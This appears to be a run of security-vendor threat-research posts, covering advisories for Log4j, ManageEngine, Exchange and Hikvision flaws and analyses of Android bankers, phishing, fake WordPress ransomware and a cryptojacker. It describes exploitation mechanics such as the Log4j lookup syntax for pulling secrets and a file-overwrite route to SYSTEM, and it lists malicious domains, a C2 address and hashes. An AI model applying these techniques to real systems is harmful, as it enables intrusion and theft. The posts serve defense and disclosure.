Posts

Apache Log4j Remote Code Execution Vulnerability

/in /by

Overview:

Apache Log4j is a Java-based logging utility that can be configured through a configuration file or through Java code. Apache Log4j provides many features, such as reliability, extensibility, multiple configuration support including xml/json/yaml, excellent performance and more.

A JNDI Injection vulnerability has been reported in the JndiManager class of Apache Log4j. This vulnerability is due to improper handling of logged messages.

A remote, unauthenticated attacker who can control log message contents can exploit this vulnerability by sending a specially crafted parameter to the target application. Successful exploitation results in the information disclosure, or remote code execution.

CVE Reference:

This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2021-44228.

Common Vulnerability Scoring System (CVSS):

The overall CVSS score is 9.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:F/RL:O/RC:C).

Base score is 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H), based on the following metrics:

  • Attack vector is network.
  • Attack complexity is low.
  • Privileges required is none.
  • Attack vector is network.
  • Attack complexity is low.
  • Privileges required is none.
  • User interaction is none.
  • Scope is changed.
  • Impact of this vulnerability on data confidentiality is high.
  • Impact of this vulnerability on data integrity is high.
  • Impact of this vulnerability on data availability is high.

Temporal score is 9.3 (E:F/RL:O/RC:C), based on the following metrics:

  • The exploit code maturity level of this vulnerability is functional.
  • The remediation level of this vulnerability is official fix.
  • The report confidence level of this vulnerability is confirmed.

Technical Overview:

The Java Naming and Directory Interface (JNDI) is a Java API for a directory service that allows Java software clients to discover and look up data and resources (in the form of Java objects) via a name. JNDI support many services including Lightweight Directory Access Protocol (LDAP), Domain Name Service (DNS) and so on. Apache Log4j supports many performing lookups, including JNDI lookups.

The JNDI lookups feature on vulnerable version of Apache Log4j2.x allows it to add values at arbitrary places to Log4j configuration. Log4j is having a special syntax in the form ${lookup_name:key} (where lookup_name=one of the different lookups, key=attribute to be evaluated). When an attacker includes a string ${ in the request, the Log4j will attempt to write the same into the log data, while doing the same lookup method will be called which will find the strings after ${ and attempt to replace the strings with the actual values. For instance ${env:COMPUTERNAME} will become actual computer name(ex. TEST-PC) and ${env:AWS_ACCESS_KEY_ID} will become actual AWS SECRET KEY.

The JNDI lookups are enabled by default in the vulnerable versions of Log4j2.x and it does not sanitize the inputs, hence allowing attackers to send maliciously crafted requests to the web server or application which is using Log4j. The application will then respond with the evaluated strings.

Majority of attacks is using LDAP protocol as specified in the POCs available publicly, attackers are trying to leverage some other protocols as well, such as RMI, LDAPS, HTTP(S), DNS, IIOP, COBRA, NIS and NDS. Payloads are found in different section of HTTP request such as URI, parameters, headers such as User-Agent and Referrer and request body, as attackers trying to log the payload anyways so that it would be parsed by vulnerable Log4j.

This vulnerability becomes the worst exploited in the wild vulnerability in recent times, we are getting wide range of mutations in the payloads as attackers are trying to evade the protection or detection in place, for example, base64 encoded data. SonicWall has released multiple signatures to protect their customers.

Triggering the Problem:

  • The target must be running a vulnerable version of the software.
  • The attacker must have network connectivity to the vulnerable server.

Triggering Conditions:

The attacker sends a maliciously crafted parameter to the vulnerable server. The server logs the parameter using Log4j. The vulnerability is triggered when the server parses the JNDI lookup included in the log message.

SonicWall Capture Labs Threat Research is aware of vulnerability in Log4j Java-based logging library and has released the following IPS signature to detect the exploitation of threats related to CVE-2021-44228:

  • IPS: 2307  Apache Log4j2 JNDI Log Messages Remote Code Execution
  • IPS: 2067 Apache Log4j2 JNDI Log Messages Remote Code Execution LDAPS
  • IPS: 15732 Apache Log4j2 JNDI Log Messages Remote Code Execution NIS
  • IPS: 15733 Log4j2 JNDI Log Messages Remote Code Execution NDS
  • IPS: 15734 Apache Log4j2 JNDI Log Messages Remote Code Execution COBRA
  • IPS: 15735 Apache Log4j2 JNDI Log Messages Remote Code Execution RMI
  • IPS: 15736 Apache Log4j2 JNDI Log Messages Remote Code Execution IIOP
  • IPS: 15737 Apache Log4j2 JNDI Log Messages Remote Code Execution DNS 2
  • IPS: 2311 Apache Log4j2 JNDI Log Messages Remote Code Execution HTTP
  • IPS: 2315 Apache Log4j2 JNDI Log Messages Remote Code Execution DNS
  • IPS: 2328 Apache Log4j2 JNDI Log Messages Remote Code Execution HTTPS

Please note that if your web service/server is accessible over HTTPS, then enabling of Server DPI-SSL is necessary for the above signature to detect exploits targeting this vulnerability.

SonicWall’s, (WAF) Web Application Firewall, provides protection against this threat:

  • WAF: 1116 Apache Log4j2 JNDI Log Messages Remote Code Execution

Remediation Details:

The risks posed by this vulnerability can be mitigated or eliminated by:

  • Enable above mentioned IPS signatures on SonicWall firewalls
  • Enable Web Application Firewall signature above.
  • Updating to a non-vulnerable version of the product or applying the vendor supplied patch.
  • Removing the JndiLookup class from the classpath.

The vendor has released the following advisory regarding this vulnerability:
Vendor Advisory

Zoho ManageEngine Arbitrary File Upload Vulnerability

/in /by

Overview:

  ManageEngine ServiceDesk is an IT help desk platform that provides functionality to manage various aspects of an IT environment such as changes, incidents and assets and also incorporates a standard ITIL framework. ManageEngine SupportCenter Plus is a web-based customer support software that lets organizations effectively manage customer tickets, their account & contact information and the service contracts. The code/features between these two applications is extensively shared.

  An arbitrary file upload vulnerability has been reported in Zoho ManageEngine ServiceDesk Plus, ServiceDesk Plus MSP, and SupportCenter Plus. The vulnerability is due to an unspecified flaw related to the /RestAPI URLs in a servlet, and ImportTechnicians in the Struts configuration.

  A remote attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could allow the attacker to execute arbitrary code with privileges of SYSTEM.

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2021-44077.

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 8.7 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O/RC:C).

  Base score is 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is none.
    • User interaction is none.
    • Scope is changed.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 8.7 (E:U/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is unproven.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

Technical Overview:

  ManageEngine ServiceDesk/SupportCenter include the features for configuring technicians information. The IT help desk team comprises the help desk team manager, help desk agent, and technicians who will be handling the requests posted / raised by various requesters from different accounts. A user can add, edit, or remove the technicians in the application and also provide them with various access privileges that suit their role and need. A user can also view the list of technicians in a particular account and/or site by selecting the account from the Accounts combo box and site from Technicians for combo box. The feature relevant to understanding this vulnerability is importing technicians information from a comma-separated (CSV) file into the application. Note that this feature is a legacy feature that is no longer available in both the unpatched (at least in the versions 11012 and 11012) and patched version of the SupportCenter Plus application.

  This feature is accessible via Apache Struts action ImportTechnicians defined in struts-config.xml. This feature is mapped to Request-URL “/RestAPI/ ImportTechnicians”. An unrestricted arbitrary file upload vulnerability exists in ManageEngine ServiceDesk Plus, ServiceDesk Plus MSP and SupportCenter Plus products. The vulnerability is due to improper validation of the filename parameter.

  The user sends a POST request to /RestAPI/ImportTechnicians and the value of the Content-Type header is string multipart/form-data, the execute method in the class com.adventnet.servicedesk.setup.action.ImportTechniciansAction is eventually called. The execute method uses the value of the filename attribute of the Content-Disposition header in the body of the request to write the contents of the file in the “\SupportCenterPlus\bin” or “\ServiceDesk\bin” directories (dependent on the specific product of ManageEngine).

  The uploaded file is not checked for the expected file extension which is “.csv”. Note that directory traversal is not possible as the Java classes org.apache.struts.upload.CommonsMultipartRequestHandler and org.apache.struts.upload.CommonsMultipartRequestHandler.CommonsFormFile from struts.core-1.3.11.jar are used by the application to remove from the filename parameter all characters before the last ‘/’ or ‘\’ character, before the vulnerable code in com.adventnet.servicedesk.setup.action.ImportTechniciansAction is reached.

  A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to ImportTechnicians action to write or overwrite arbitrary files in “\SupportCenterPlus\bin” or “\ServiceDesk\bin” directories (dependent on the specific product of ManageEngine). For instance, an attacker can overwrite file jreCorrector.bat in this directory. This batch file is executed during the startup of the product by wrapper.exe executable. It is also executed during the shutdown of the product. Also ManageEngine ServiceDesk/SupportCenter products are by default started automatically as a Windows service during the Windows startup (or after Windows restart). Therefore, successful exploitation could result in the arbitrary code execution with SYSTEM-level privileges.

Triggering the Problem:

  • The target must be running a vulnerable version of the software.
  • The attacker must have network connectivity to the target server.

Triggering Conditions:

  The attacker sends a request to the vulnerable servlet on the target server. The vulnerability is triggered when the server processes the request.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • HTTP, over port 8080/TCP

SonicWall’s, (IPS) Intrusion Prevention System, provides protection against this threat:

  • IPS: 2302 ManageEngine Products ImportTechnicians Arbitrary File Creation

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Restricting access to the affected communication port to trusted hosts only.
    • Upgrading to a non-vulnerable version of the product when available.
    • Detecting and blocking malicious traffic using the signature above.
  The vendor has released the following advisory regarding this vulnerability:
  Vendor Advisory 1
  Vendor Advisory – ServiceDesk Plus MSP
  Vendor Advisory 2
  Vendor Advisory – ServiceDesk Plus
  Vendor Advisory 3

Feature rich Android banker masquerades as DHL parcel tracking app and uses Telegram API as a means of communication

/in /by

SonicWall Threats Research team observed an Android malware masquerading as a DHL app. This app is (at the time of writing the blog) actively hosted on hxxp://dhl-getnextalert.duckdns.org and gets downloaded as DHL.apk:

 

Application analysis

Android apk specifics:

The app requests for a number of permissions but some of these stand out when it comes to the privacy of a user:

  • CALL_PHONE
  • SHUTDOWN
  • WAKE_LOCK
  • RECEIVE_SMS
  • READ_SMS
  • SEND_SMS
  • REQUEST_IGNORE_BATTERY_OPTIMIZATIONS
  • MODIFY_AUDIO_SETTINGS
  • READ_CONTACTS
  • WRITE_CALL_LOG
  • READ_CALL_LOG
  • WRITE_CONTACTS
  • REQUEST_DELETE_PACKAGES
  • RECEIVE_BOOT_COMPLETED
  • FOREGROUND_SERVICE

A vigilant user should take a step back and think if an app that claims to be a package delivery app like DHL needs the permission to shutdown a mobile device.

 

Once installed the application requests for accessibility permissions from the victim:

 

The malware shows a lengthy explanation to the user for granting the accessibility service:

 

Capabilities

This malware is well equipped to perform a number of operations, some of the capabilities include:

  • Dump SMS, call logs, contacts
  • Send SMS to all contacts (Can be used to spread to other devices)
  • Show a list of installed apps
  • Install and uninstall apps
  • Disable Google Play Protect
  • Open URL in browser
  • Forward SMS to Telegram Bot
  • Inject pages on the device (Can be used for phishing)
  • Read all notifications (Can be used to steal OTP)
  • Steal Google Authenticator codes
  • Steal Wifi password, credit card details
  • Hide app icon (Makes the malware stealthy)

 

Some of these capabilities are highlighted below:

  • The malware extracts and sends identifiers for the infected device which includes:
    • Brand
    • Model
    • Version
    • Serial

 

  • The malware can forward SMS messages that are received on the device to the attacker:

 

  • The malware is capable of communicating with the attacker via Telegram:

 

  • The malware has capabilities of stealing Google Authenticator information:

 

  • The malware can monitor notifications that are displayed on the device. This trick can be used to steal OTP codes that are received by the victim:

 

Network Communication

Once the malware is executed on the device, it communicates with the attacker using Telegram. It informs about the infection by reporting that a new device has installed the malware:

 

It sends the details of the infected device:

 

One of the network exchange involves sending a list of commands that the malware supports:

 

 

network investigation

The domain name includes dhl  which indicates that this domain was created to spread DHL themed malware/threats. VirusTotal graph gives more information about the connections of this domain to other malicious domains:

 

As visible there are a number of other malicious links that are hosted on duckdns.org with themes related to popular organizations. Some examples are listed below:

  • citi22bankonline.duckdns.org
  • jpmorgamrecovery.duckdns.org
  • citibank-security09.duckdns.org
  • kenzy-group87.duckdns.org
  • billoptusnet.duckdns.org
  • dhl-getnextalert.duckdns.org

A number of these domains have malicious ratings on VirusTotal.

 

Targets

The malware stores a huge list of application names that it targets. It can be speculated that the malware can detect presence of these targeted apps and can show corresponding fake phishing pages for these apps that can be used to steal login credentials, credit card information and other valuable information. The malware stores apps belonging to the following categories along with the number of targeted apps

  • Cryptocurrency – 14
  • Social Media – 6
  • Mail – 8

The malware targets a number of banks from different countries. Below is a list of countries and the number of banks belonging to each country that are targeted:

  • Australia – 17
  • Canada – 4
  • Germany – 14
  • Spain – 9
  • India – 11
  • Italy – 12
  • Netherlands – 5
  • Poland – 20
  • Russia – 22
  • Turkey – 18
  • United-Kingdom – 12
  • United-States – 23

 

Additional observations

The app contains mis-spelled words like Assablity, MainActivitryLoader, Reciever which leads us to believe that there is a chance that this app is created by non-english speaking developers:

 

The directory structure which is accessible on the server contains interesting indicators

  • Few files/directories have last modified date as 12/04/2021
  • One of the directory has the last modified date as 08/07/2021 so we can assume that attackers have been working on this threat from at least the last 4 months

 

We found a hardcoded address at the location of the installed files on the infected device – hxxps://rikobot.xyz

 

 

In summary, this banking threat contains a large number of targeted applications from multiple countries. It is feature rich with a large number of capabilities under its belt and finally, it communicates with the attackers via Telegram bots.

 

Sonicwall Capture Labs provides protection against this threat using the signature listed below:

  • AndroidOS.Telegram.BK
  • AndroidOS.Telegram.BK_1

 

Indicators of Compromise:

  • 6a729b0ac0fd14c2c5ee97018e61705e
  • 6a9f23b83c09d90d436163af3684c45d

 

Some of the targeted applications that are hardcoded in this malware are:

au.com.bankwest.mobile
au.com.cua.mb
au.com.ingdirect.android
au.com.mebank.banking
au.com.nab.mobile
au.com.suncorp.SuncorpBank
ch.protonmail.android
co.uk.Nationwide.Mobile
coinone.co.kr.official
com.abnamro.nl.mobile.payments
com.albarakaapp
com.anz.android.gomoney
com.aol.mobile.aolapp
com.att.myWireless
com.axis.mobile
com.bankinter.launcher
com.bankofbaroda.mconnect
com.bankofqueensland.boq
com.barclays.android.barclaysmobilebanking
com.bbva.netcash
com.bcu.bcu
com.bendigobank.mobile
com.binance.dev
com.bitfinex.mobileapp
com.btckorea.bithumb
com.btcturk.pro
com.chase.sig.android
com.cibc.android.mobi
com.citi.citimobile
com.citibank.mobile.au
com.clairmail.fth
com.coinbase.android
com.comarch.security.mobilebanking
com.csam.icici.bank.imobile
com.db.mm.norisbank
com.db.pwcc.dbmobile
com.ddengle.bts
com.denizbank.mobildeniz
com.dunamu.exchange
com.empik.empikapp
com.empik.empikfoto
com.facebook.orca
com.finansbank.mobile.cepsube
com.finanteq.finance.ca
com.firsttech.firsttech
com.fusion.ATMLocator
com.garanti.cepsubesi
com.getingroup.mobilebanking
com.google.android.gm
com.grppl.android.shell.BOS
com.grppl.android.shell.CMBlloydsTSB73
com.grppl.android.shell.halifax
com.idamob.tinkoff.android
com.idamobile.android.hcb
com.idbi.mpassbook
com.ifs.banking.fiid3364
com.ifs.banking.fiid8025
com.imb.banking2
com.imo.android.imoim
com.IndianBank.IndOASIS
com.infonow.bofa
com.infrasoft.uboi
com.ing.mobile
com.ingbanktr.ingmobil
com.instagram.android
com.konylabs.capitalone
com.korbit.exchange
com.kubi.kucoin
com.kutxabank.android
com.kuveytturk.mobil
com.latuabancaperandroid
com.lynxspa.bancopopolare
com.magiclick.odeabank
com.mail.mobile.android.mail
com.microsoft.office.outlook
com.mobikwik_new
com.mobile.banking.bnp
com.mobillium.papara
com.moneybookers.skrillpayments
com.moneybookers.skrillpayments.neteller
com.mycelium.wallet
com.navyfederal.android
com.openbank
com.oxigen.oxigenwallet
com.paxful.wallet
com.payeer
com.payoneer.android
com.paypal.android.p2pmobile
com.plunien.poloniex
com.Plus500
com.pnc.ecommerce.mobile
com.pozitron.iscep
com.rbc.mobile.android
com.rbs.mobile.android.natwest
com.rbs.mobile.android.rbs
com.rbs.mobile.android.ubn
com.regions.mobbanking
com.rsi
com.sbi.lotusintouch
com.sbi.SBIFreedomPlus
com.scotiabank.banking
com.scotiabank.banking”
com.snapchat.android
com.snapwork.hdfc
com.starfinanz.smob.android.sfinanzstatus
com.stripe.android.dashboard
com.suntrust.mobilebanking
com.targo_prod.bad
com.td
com.tdbank
com.teb
com.tecnocom.cajalaboral
com.tescobank.mobile
com.tmobtech.halkbank
com.touchin.perfectmoney
com.triodos.bankingnl
com.unicredit
com.unocoin.unocoinwallet
com.usaa.mobile.android.usaa
com.usbank.mobilebanking
com.vakifbank.mobile
com.vzw.hss.myverizon
com.wallet.crypto.trustapp
com.westernunion.android.mtapp
com.wf.wellsfargomobile
com.whatsapp
com.woodforest
com.yahoo.mobile.client.android.mail
com.ykb.android
com.ziraat.ziraatmobil
com.ziraatkatilim.mobilebanking
de.comdirect.android
de.commerzbanking.mobil
de.consorsbank
de.dkb.portalapp
de.fiduciagad.android.vrwallet
de.ingdiba.bankingapp
de.postbank.finanzassistent
de.santander.presentation
de.sdvrz.ihb.mobile.app
es.bancosantander.apps
es.cm.android
es.evobanco.bancamovil
es.lacaixa.mobile.android.newwapicon
eu.unicreditgroup.hvbapptan
finansbank.enpara
io.hotbit.shouy
it.bnl.apps.banking
it.bnl.apps.enterprise.bnlpay
it.bpc.proconl.mbplus
it.copergmps.rt.pf.android.sp.bmps
it.gruppocariparma.nowbanking
it.ingdirect.app
it.nogood.container
it.popso.SCRIGNOapp
kr.co.gopax
localbitcoin
logo.com.mbanking
modulbank.ru.app
nl.asnbank.asnbankieren
nl.snsbank.mobielbetalen
org.banksa.bank
org.bom.bank
org.stgeorge.bank
org.telegram.messenger
org.vystarcu.mobilebanking
org.westpac.bank
piuk.blockchain.android
pl.aliorbank.aib
pl.allegro
pl.bps.bankowoscmobilna
pl.bzwbk.bzwbk24
pl.bzwbk.ibiznes24
pl.ceneo
pl.com.rossmann.centauros
pl.ideabank.mobilebanking
pl.mbank
pl.millennium.corpApp
pl.orange.mojeorange
pl.pkobp.iko
pl.pkobp.ipkobiznes
posteitaliane.posteapp.apppostepay
ru.akbars.mobile
ru.alfabank.mobile.android
ru.alfabank.oavdo.amc
ru.avangard
ru.ftc.faktura.expressbank
ru.gazprombank.android.mobilebank.app
ru.mail.mailapp
ru.mkb.mobile
ru.mts.money
ru.mw
ru.ok.android
ru.raiffeisennews
ru.rosbank.android
ru.rshb.dbo
ru.sberbankmobile
ru.tutu.tutu_emp
ru.ucb.android
ru.vtb24.mobilebanking.android
ru.yandex.taxi
tr.com.hsbc.hsbcturkey
tr.com.sekerbilisim.mbank
uk.co.hsbc.hsbcukmobilebanking
uk.co.santander.santanderUK
uk.co.tsb.newmobilebank
us.hsbc.hsbcus
wit.android.bcpBankingApp.millenniumPL

Phishing campaigns are facile to steal credential

/in /by

SonicWall Capture Labs Threats Research team has been detecting an ongoing phishing campaign which abuses users by pretending to be genuine software platform using their logo. Upon opening the PDF file, an image with instructions on how to download PDF Invoice is displayed to the user:

 

 

If the instructions as mentioned in the PDF file are followed, a malicious URL is opened, the user is shown a genuine looking webpage with options to select email providers like Office365 and others to view the document:

 

 

 

Depending upon the email provider chosen by the user, one of the following forms would be displayed:

 

 

 

Upon entering the user credentials and clicking the log-in button the user is displayed an error saying Incorrect username or password.

 

 

 

However, in the background the malware author steals user credentials when the log-in button is clicked and sends them to remote web server and uses Cloud flare servers to stay anonymous as shown below:

 

 

The PDF files is not detected by any vendor when checked on top threat intelligence sharing portals like VirusTotal:

 

 

SonicWall Capture Labs provides protection against this threat via the SonicWall Capture ATP w/RTDMI.

Indicators Of Compromise (IOC):

  • beb92babeedfc365857b1f8df2491de84c567e4fe090555cf9217a3075e1267e

 

Microsoft Exchange Server HandleBackEndCalculationException Vulnerability

/in /by

Overview:

  Microsoft Exchange Server is an ASP.NET implementation of an email and calendaring server and is capable of handling most standard Internet protocols as well as numerous proprietary Microsoft protocols and formats. Microsoft Exchange Server provides web access for users to various components such as Outlook Web Access and Autodiscover. Autodiscover is a component that allows clients to automatically discover the Exchange settings for the client without requiring users to know specific server addresses.

  A reflected cross-site scripting vulnerability has been reported in Microsoft Exchange Server. The vulnerability is due to insufficient sanitization of incoming request parameters reflected in exception messages returned by the
server.

  A remote attacker can exploit this vulnerability by enticing a target user into clicking a malicious link. Successful exploitation could result in arbitrary script execution in the target user’s browser.

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2021-41349.

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 8.6 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C).

  Base score is 9.6 (AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is none.
    • User interaction is required.
    • Scope is changed.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 8.6 (E:P/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is proof of concept.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

Technical Overview:

  When any Exchange module receives an HTTP request, it is eventually handled by the OnPostAuthorizeInternal() method of the ProxyModule class in Microsoft.Exchange.FrontEndHttpProxy.dll. In the case the request is not authenticated, the SelectHandlerForUnauthenticatedRequest() method is then called which checks the value of the HttpProxy.ProtocolType property to determine which module the request was received by and decide which specific ProxyRequestHandler class to instantiate in order to handle the request. In the case that the request is received by the Autodiscover module (i.e. the request-URI begins with “/autodiscover”) HttpProxy.ProtocolType is set to “Autodiscover” and as a result SelectHandlerForUnauthenticatedRequest() creates an AutodiscoverProxyRequestHandler object as the handler for the request.

  Once the handler is chosen, the Run() method of the ProxyRequestHandler object is called which applies the handler to the HttpContext object for the request with the RemapHandler() method. The request is then processed with the BeginProcessRequest() method which queues a call to the BeginCalculateTargetBackEnd() method in the thread pool. BeginCalculateTargetBackEnd() calls InternalBeginCalculateTargetBackEnd() which attempts to resolve the anchor mailbox location for the request. The resolution is performed by first calling TryDirectTargetCalculation(), which returns null because this is the default method behaviour and the method is not overridden by AutodiscoverRequestHandler or any of its parent classes. InternalBeginCalculateTargetBackEnd() then calls ResolveAnchorMailbox() which is overridden in AutodiscoverRequestHandler and its parent classes EwsAutodiscoverProxyRequestHandler and BEServerCookieProxyRequestHandler.

  AutodiscoverRequestHandler.ResolveAnchorMailbox() only handles autodiscover requests with a request-URI containing “/wssecurity/x509cert” and otherwise calls EwsAutodiscoverProxyRequestHandler.ResolveAnchorMailbox(). This method inspects the request-URI to see if it corresponds to a specific type of autodiscover request. If the request path ends with “/autodiscover.json” it is considered an “autodiscover V2 preview request” and if this is the case, an explicit logon address is retrieved from the Email HTTP query, form field, or cookie value. When attempting to retrieve the value from HTML form fields, the ValidateHttpValueCollection() method is called to validate the form fields. In turn, this method calls ValidateString() on each form field.

  Each field is checked by calling System.Web.Util.RequestValidator.IsValidRequestString(), which calls System.Web.CrossSiteScriptingValidation.IsDangerousString() with the form field value. This method considers the value dangerous if it contains either (1) ‘<' followed by a letter, '!', '/', or '?'; or (2) the sequence "&#". If the form field value is considered dangerous, the ValidateString() method returns an HttpRequestValidationException exception. This exception's message contains the form name and its truncated value.

  If an HttpRequestValidationException exception is thrown, it is caught by the method BeginCalculateTargetBackEnd() and the exception is handled by HandleBackEndCalculationException(). This exception is eventually handled by the method HandleHttpException(), which returns the exception message as the HTTP response, without encoding the message contents.

Triggering the Problem:

  • The target system must have the vulnerable product installed and running.
  • The attacker must be able to deliver a malicious URL to the target user.

Triggering Conditions:

  An attacker entices a user to open a page that redirects the user to a malicious URL. The vulnerability is triggered when the server parses the crafted request and returns a page containing injected JavaScript code to the target user’s browser.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • HTTPS, over port 443/TCP

SonicWall’s, (IPS) Intrusion Prevention System, provides protection against this threat:

  • IPS: 15711 Microsoft Exchange Server Spoofing Vulnerability (CVE-2021-41349)

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Applying the vendor supplied patch resolving the vulnerability.
    • Upgrading to a version unaffected by the vulnerability.
    • Detecting and filtering malicious traffic using the signature above.
  The vendor has released the following advisory regarding this vulnerability:
  Vendor Advisory

WordPress websites plagued by fake ransomware

/in /by

A number of WordPress websites have been infected with what appeared to be ransomware. The infected websites show a warning on its homepage saying the site has been encrypted and listing a bitcoin address on where to send payment to restore the site. But further analysis finds that the warning was fake and was just meant to scare and extort money.

 

Infection details:

Websites that are infected show a warning sign on their homepage:

But this warning turned out to be bogus and is just a simple html page.

It also includes a simple script to add a countdown timer to add a sense of urgency and make it more believable.

It appears that an infected directorist_base.php was responsible for the bogus warning page. But nothing was encrypted.

directorist_base.php

Although another file named “azz_encrypt.php” is being referenced but the file cannot be found in the system. Presumably this file can be used for encrypting the system given the filename.

azz_encrypt.php

These compromised websites had no serious damage and these cybercriminals just wanted a quick buck using a simple hack. However, the fact that these cybercriminals were able to get access and deploy this rather effortless scheme means they could have done more damage had they used a more sophisticated malware.

A quick google search for the phrase “FOR RESTORE SEND 0.1 BITCOIN:” turns up quite a few websites that are infected with this malware. However, it appears that none of them had been scared enough to pay the demand since the bitcoin address specified on the warning has not received any payment yet.

3BkiGYFh6QtjtNCPNNjGwszoqqCka2SDEc

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV:FakeWP.RSM (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

 

 

 

 

 

Fraud Apps that intimidate victims being distributed via Google Play Store

/in /by

SonicWall Capture Labs Threats Research team has been regularly sharing information about the malware threats targeting Android devices. SonicWall has tracked down the huge number of financial fraud applications.

 

Since the start of the year, it has become a trend to gain easy money for malware authors Google play store removed hundreds of similar applications. More than 30 fraud Apps have been noticed in the Google Play Store, the concerned team has already been notified:

 

These app target Indian Android Phone consumers and is portrayed as an app that would assist in obtaining a loan. High installation count (few of these apps have 1 Million+) indicates many users might have fallen prey to this fraud app. Some of the app icons are shown below:

 

After installation, they ask for Images of documents like AADHAR (Unique Identification Authority of India) card, PAN (Permanent Account Number) card, and Bank Account details. There is no validation of the information as shown in the image, random numbers as AADHAR number and account number were entered and successfully proceed further:

 

We tried it in a without sim card device there also it generates OTP.  Following is the code snippet for fake OTP generation:

 

Fake OTP appears on the device looks as shown in the following image:

 

They ask for some money as a security deposit in Indian rupees via different payment modes, and the user will not get any loan:

 

Fake 5-star ratings, good comments, and high download count are one of the reasons users are falling prey for:

 

During our investigation we were monitoring some of these applications, in a couple of cases we got threat messages on registered mobile numbers:

 

As part of this campaign a victim is compromised in multiple ways:

  • Money for fake loan security
  • Compromised data
  • Advertisement
  • Threat for more money

SonicWall Capture Labs provides protection against this threat via the SonicWall Capture ATP w/RTDMI.

Package name for reported apps are as follows:

Cryptojackers target servers running Alibaba Cloud

/in /by

This week the Sonicwall Capture Labs Research team analyzed malware samples that appear to be targeting one of the popular cloud computing platforms, Alibaba Cloud (Aliyun). Alibaba Cloud might not be the first name that comes to mind when you think of cloud computing service providers. However, it is the 4th largest cloud provider globally behind Amazon Web Services, Microsoft Azure and Google Cloud, thus a very appealing target to cybercriminals. The end goal of this malware is to use the victim machine for mining cryptocurrencies.

Infection cycle:

The malware arrives as a bash script. Upon execution it disables Alibaba cloud monitoring agents and cloud assistant service. These services allow for monitoring resources and applications and set alarms for difference scenarios. Disabling these services lets the malware execute without possibly notifying the owner of the victim machine when certain metrics or rules have been triggered.

It then proceeds to disable other processes and cryptomining services that can compete with the CPU resources. These commands are within a function named “kill_miner_proc().”

TeamTNT and Kinsing are two of the top threat groups dominating the cryptojacking arena by infiltrating vulnerable servers for the purpose of running cryptominers.  This malware has a special function named “fuckyou()” specifically targeting processes and other files known to be used by the aforementioned cybercriminal groups effectively disabling them if present in the infected system. This establishes a clean slate for when this malware finally runs its cryptominer.

It then proceeds to download XMRig miner and executes it.

To maintain persistence it deletes the current cronjob and adds the miner process and a copy of itself into cron.

And the entire infection cycle continues.

It is unlikely that the owner of a compromised server will notice the issue right away. Unlike with ransomware, where the victim is made aware of the infection so the cybercriminal can collect its dues, attacks such as this can quietly run in the background, silently profit without demanding a ransom and persist for a long period of time.

Sonicwall Capture Labs provides protection against this threat via the following signatures:

  • GAV: Coinminer.AIY (Trojan)
  • GAV: XMRig.XMR_13 (Trojan)

This threat is also detected by Sonicwall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Command Injection Vulnerability in Hikvision products

/in /by

Hikvision provides top-of-the-line IoT solutions and video security systems for a broad range of verticals.

Command Injection Vulnerability
The goal of command injection attack is the execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation

CVE-2021-36260
A command injection vulnerability exists in the web server of some Hikvision product. Due to the insufficient input validation, attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands.

A seen in the example, the attacker sends a command to reboot the affected device. This attack will be successful if attacker has access to the device network or the device has direct interface with the internet.

The device firmware is affected by this security vulnerability (CVE-2021-36260) if its version dated earlier than 210628. Hikvision has patched this vulnerability

SonicWall Capture Labs provides protection against this threat via following signatures:

    • IPS 15701:Hikvision IP Camera Command Injection

Threat Graph

An Android crypto wallet stealer

/in /by

With the rise in popularity and investments in Crypto currency there has been a rise in Crypto related scams as well. SonicWall Threats Research team identified an Android crypto wallet stealing malicious Android application.

 

 

Initial Activity

Upon installation and execution the app requests the user to grant Accessibility Services:

 

The app needs these services so that it can perform clicks in the background on behalf of the user. This is the modus-operandi used by the app to steal crypto wallets from the targeted wallet app – com.wallet.crypto.trustapp.

 

Accessibility Services

In order to gain the user’s trust and to convince the user to grant Accessibility Services, the malware provides an explanation to the user:

 

The malware creates a service – com.test.accessibility.MyAccessibilityService – that contains a number of interesting elements

  • Hardcoded server URL – http://159.69.139.252:999

 

